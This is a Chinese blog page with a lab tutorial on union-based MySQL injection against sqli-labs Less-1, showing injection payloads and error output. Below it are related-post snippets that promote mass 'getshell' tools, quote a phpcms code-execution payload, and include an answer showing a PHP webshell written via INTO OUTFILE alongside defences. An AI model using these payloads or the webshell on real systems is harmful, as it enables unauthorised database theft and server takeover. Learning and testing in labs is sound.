Mysql注入思路+编写脚本批量dump数据+getshell——SQL注入

最新推荐文章于 2025-02-13 20:10:25 发布
最新推荐文章于 2025-02-13 20:10:25 发布
阅读量1.6k 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: Web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CC__Faker/article/details/117970275
本文详细介绍了MySQL注入的过程,包括注点判断、回显字段确定、函数注入和数据获取。通过编写Python脚本批量下载数据,并讨论了getshell的方法,包括文件写入和一句话木马的利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

前言

本次渗透测试的目的是为了验证SQL注入的危害和对联合查询注入的思路,以及编写脚本批量下载。最后进行getshell的一个操作。
注:本次测试位于一个理想环境,无WAF,无过滤

环境:sqli-labs less-1,phpstduy
工具:蚁剑,pycharm

0x01 sql注入测试

0x0101 注点判断

首先给id=1,测试正常情况。返回结果是name和password
在这里插入图片描述尝试让sql语句报错,获取sql相关信息。我们的关注点应该是两个单引号中间的22 --,说明左边单引号形成闭合,源代码中id变量是被两个单引号包裹起来的。

payload:=>http://127.0.0.1/sqlilab/Less-1/?id=11'22 --+

报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘22 – ’ LIMIT 0,1’ at line 1
在这里插入图片描述

0x0102 回显字段判断

利用order by判断字段数,根据3返回页面正常,4返回页面错误,得出回显字段为3个。

payload=>http://127.0.0.1/sqlilab/Less-1/?id=1' order by 4 --+

在这里插入图片描述利用联合查询 union select 加字段数判断回显字段属于哪个字段。这里需要让前半部分的值为假,后半部分的字段才会显示出来。根据回显信息可以看出回显字段为,2,3

payload=>http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,3 --+

在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
weixin_29863401的博客
03-11 608
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧谷歌批量还需改进 一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com...
nginx防mysql注入_nginx的安全之通过nginx+lua的waf防火墙防sql注入和cc攻击
weixin_36314729的博客
01-29 594
2.测试页面准备:登陆页面html[root@node1 code]#cat /opt/app/code/login.htmljeson sql注入演示用户名:密码验证页面validate.php[root@node1 code]#cat /opt/app/code/validate.php
批量 多个mysqldump
weixin_35510737的博客
08-07 108
我整理的一些关于【MySQL,SQL】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://edu.51cto.com/surl=QDW3g3批量多个 MySQLDump 的方法探讨 在数据库运维中,备份是一个至关重要的环节。尤其是在使用 MySQL 数据库时,定期进行数据库备份能够有效降低数据丢失...
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
dvwa批量mysql注入脚本_【DVWA】SQL注入
weixin_33016287的博客
02-15 168
0x01 LowSQL Injection最简单的注入,没有任何过滤,常规语句注入即可:11'1'#1' union select 1,2 #0' union select database(),2 #0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'...
[笔记]使用mysqldump 批量备份 mysql数据库 for windows
YC.PENG的专栏
03-06 2496
使用asp文件生成备份脚本 对应设置IIS用户,需要有读取mysql文件夹的权限 <%----------mysqldump用户名root = "root"----------密码pwd = "123456"----------mysql mysqldump 文件所在位置mysql_bin_path = "D:/mysql/bin"-------
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2716
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入数据库类型分:sql:oracle、MySQL、mssql、access、sq...
SQL注入之盲注(boolean注入+时间盲注)
m0_74355247的博客
02-13 189
【代码】SQL注入之盲注(boolean注入+时间盲注)
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2411
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
批量getshell教程+工具
07-28
批量getshell教程+工具
[清风批量]getshell工具.zip
07-28
getshell超级好用的工具
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
百度批量注入点拿shell
05-22
百度批量注入点拿shell
python爬虫与sqlmap进行的一次批量注入
WDNMD2223的博客
01-15 1013
python爬虫与sqlmap进行的一次批量注入 新手小白第一次写文章,略微紧张。。。 话不多讲,直入正题。 环境的搭建 需要sqlmap和python2.7版本(注意:一定要使用python2.7版本才可以) 至于sqlmap和python的安装需要自行去百度了 思路 通过python爬虫爬取谷歌镜像站上的网页网址,然后保存在本地磁盘,通过sqlmap去批量注入保存的网址。 python爬虫代码 下面展示简单的爬虫代码。 import requests from lxml import etree ur
全自动批量get shell工具【最新】
05-13 910
全自动批量get shell 工 具【最新】多个exp集成,全自l采集,自动爬虫多个引擎和友情链接,过狗一句话,轻松日出上千。
批量getshell工具全自动_【技巧1001-19】- 文件管理升级-全自动更新版
weixin_39564831的博客
11-14 439
今天我们分享办公实战技巧19,关于文件管理,前面我们是有介绍了一篇,方法也是比较简单方便,是否临时的文件管理,不管没有办法实现文件新增和删除以及添加子文件更的问题,所以有了今天这篇,全自动更新升级版文件管理,值得说的是非常简单​简单好用的文件管理:【技巧1001-4】-批量提取文件名并建立超链接可以筛选的文件管理:Excel版本动态可筛选的文件管理器文件通用管理模板(VBA):分享|文件管理模板以...
批量getshell工具全自动_绝大多数人都不知道的电商工具,不会美工不会写文案照样能做淘宝...
weixin_39598584的博客
11-04 482
做电商不会写文案 也不会美工怎么办呢? 很简单,首先进入我们的千牛然后打开千牛的卖家工作台 点击这个店铺管理然后找到里面的智能设计然后你就可以看到这个智能设计工作台,里面的设计工具会出现四个。1.顽兔抠图电商图片处理专家,可以快速进行抠图处理轻松几步就能完成图片批量处理,节约您80%的图片处理时间。 2 鹿班设计拥有三种功能:1.店铺点击优化(网页店面智能运营) 一键生成整套模板、支持全店一键装修...
python open 函数漏洞_Python系列之——编写已知漏洞exp实现批量getshell
weixin_39542093的博客
12-09 393
作者:奶权前面一篇Python系列之——zzcms漏洞挖掘到exp编写相信大家应该都读过了大家应该都觉得用程序实现自动化漏洞利用很爽吧今天就来教一下大家怎么通过已知的漏洞编写exp0x01 漏洞分析以通达OA前台getshell为例(漏洞来自90sec论坛)论坛给出的exp讲人话就是 post一个文件、'type=addfile'和'other=}/../../../../{22'到'pda/ap...
sql注入获取webshell
最新发布
04-01
<think>好的,我现在需要详细思考用户关于通过SQL注入获取WebShell的方法及防御措施的问题。首先,我得回顾一下SQL注入的基本原理,然后结合相关引用内容来整理具体的攻击步骤和防御策略。 用户提到想了解如何通过SQL注入获取WebShell,可能是为了学习防御方法或研究安全问题。因此,我需要确保回答既涵盖攻击方法,又详细说明防御措施,并且引用的资料要准确。根据用户提供的三个引用,引用[1]提到了通过中间件如Tomcat获取WebShell的方法,引用[2]涉及发现SQL注入点,引用[3]则提供了使用sqlmap进行爆表的示例。这些内容可以帮助构建攻击步骤部分。 首先,SQL注入获取WebShell的一般方法可能包括以下几个步骤:寻找注入点、提升权限、写入WebShell、访问WebShell。需要详细说明每个步骤的具体操作,比如如何判断注入点是否存在,如何利用写入文件的权限,常见的写入函数如SELECT INTO OUTFILE等。同时,结合引用中的例子,比如使用load_file函数读取文件,或者通过sqlmap进行自动化注入。 接下来,需要提到具体的利用条件,比如secure_file_priv的设置,目录的写入权限,以及Web路径的可访问性。这些条件是否满足直接影响到攻击是否成功。例如,在MySQL中,如果secure_file_priv设置为空,才能写入文件到指定目录,否则会受到限制。 然后,关于中间件拿WebShell的方法,引用[1]提到Tomcat获取WebShell的方法,可能涉及到上传恶意war包或者利用管理界面漏洞。这部分可能需要进一步展开,但用户的问题主要围绕SQL注入,所以可能需要简要提及中间件方法作为补充,但重点还是SQL注入途径。 防御措施方面,需要从输入验证、权限控制、安全配置、错误处理等方面入手。比如使用参数化查询来防止注入,限制数据库用户的权限,禁用敏感函数,配置服务器防止文件写入等。同时,定期更新系统和中间件,使用WAF等工具也是有效的防御手段。 需要确保回答的结构清晰,分点说明攻击方法和防御措施,并在适当的地方加入引用标记。例如,在提到使用load_file函数时,引用[1]中的例子,而在讨论sqlmap的使用时,引用[3]的示例。 可能遇到的问题包括如何准确区分不同数据库系统的写入方法,比如MySQL的INTO OUTFILE和SQL Server的差异。此外,确保防御措施全面,涵盖开发层面和运维层面的策略。 最后,生成的相关问题需要与主题紧密相关,比如如何检测SQL注入漏洞,如何加固数据库权限,以及WebShell的检测方法等。这些问题可以帮助用户进一步深入学习相关安全知识。 总结一下,回答的结构应该是: 1. SQL注入获取WebShell的方法,分步骤说明,并引用相关例子。 2. 防御措施,分点详细说明。 3. 相关问题,引导用户深入探讨。 需要确保使用正确的中文表达,行内公式用$...$,独立公式用$$...$$,但在这个问题中可能涉及较少数学公式,更多是代码和步骤说明。代码部分需要用代码块格式,例如展示SQL语句或配置文件。 现在需要检查是否有遗漏的防御措施,或者攻击方法中的关键步骤。同时,确保引用的正确性,每个引用标记对应正确的引用内容。例如,引用[1]主要关于WebShell获取方法,包括中间件和CMS,引用[2]关于实战演练中的注入点发现,引用[3]关于sqlmap的具体使用。 可能还需要提到日志管理和监控,作为防御措施的一部分,但用户提供的引用中没有涉及这点,所以可能不在此次回答的重点范围内。 最终,回答需要平衡攻击方法和防御措施,既满足用户了解攻击手段的需求,又提供足够的防御建议,帮助用户提升系统安全性。</think>### 通过SQL注入获取WebShell的方法及防御措施 #### 一、SQL注入获取WebShell的典型方法 1. **发现SQL注入点** 通过输入参数测试(如单引号`'`、逻辑语句`1=1`)判断是否存在注入漏洞。例如: ```sql http://example.com/news.php?id=1' AND 1=1 --+ ``` 若页面返回正常,说明存在注入可能性[^2]。 2. **获取数据库权限与路径** - 利用`LOAD_FILE()`函数读取服务器文件(需`secure_file_priv`配置允许): ```sql UNION SELECT LOAD_FILE('/etc/passwd'), NULL --+ ``` 引用示例:`select load_file('c://windows//system32//inetsrv//MetaBase.xml')`[^1]。 - 通过数据库函数(如MySQL的`@@datadir`)获取Web根目录路径。 3. **写入WebShell** 若具备文件写入权限,使用`INTO OUTFILE`或`DUMPFILE`写入恶意脚本: ```sql UNION SELECT "<?php system($_GET['cmd']); ?>", NULL INTO OUTFILE '/var/www/html/shell.php' --+ ``` 成功写入后,通过访问`http://example.com/shell.php?cmd=id`可执行系统命令[^3]。 4. **中间件漏洞辅助利用** 例如Tomcat可通过上传恶意WAR包获取WebShell(需管理界面弱口令或权限漏洞)。 --- #### 二、关键利用条件 1. 数据库用户需具备`FILE`权限(MySQL中默认禁用)。 2. 服务器配置`secure_file_priv`为空或允许目标目录写入。 3. 已知Web应用绝对路径(可通过报错信息或数据库配置获取)。 --- #### 三、防御措施 1. **输入过滤与参数化查询** - 使用预编译语句(如PHP的PDO、Java的PreparedStatement)避免拼接SQL。 - 过滤特殊字符(如`'`、`"`、`;`)和敏感函数关键词(如`UNION`、`LOAD_FILE`)。 2. **最小化数据库权限** - 限制数据库账户权限,禁止赋予`FILE`或`SUPER`权限。 - 示例配置: ```sql GRANT SELECT, INSERT ON app_db.* TO 'web_user'@'localhost'; ``` 3. **服务器安全配置** - 设置`secure_file_priv`为限制目录(MySQL配置文件): ```ini [mysqld] secure_file_priv = /tmp ``` - 禁用危险函数(通过`disable_functions`配置PHP的`system`、`exec`)。 4. **文件系统监控** - 限制Web目录写入权限(如`chmod 755 /var/www/html`)。 - 使用入侵检测系统(IDS)监控异常文件创建行为。 5. **定期漏洞扫描** - 使用工具(如sqlmap、Nessus)检测注入漏洞[^3]。 - 更新中间件和CMS补丁(如Tomcat、WordPress)。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值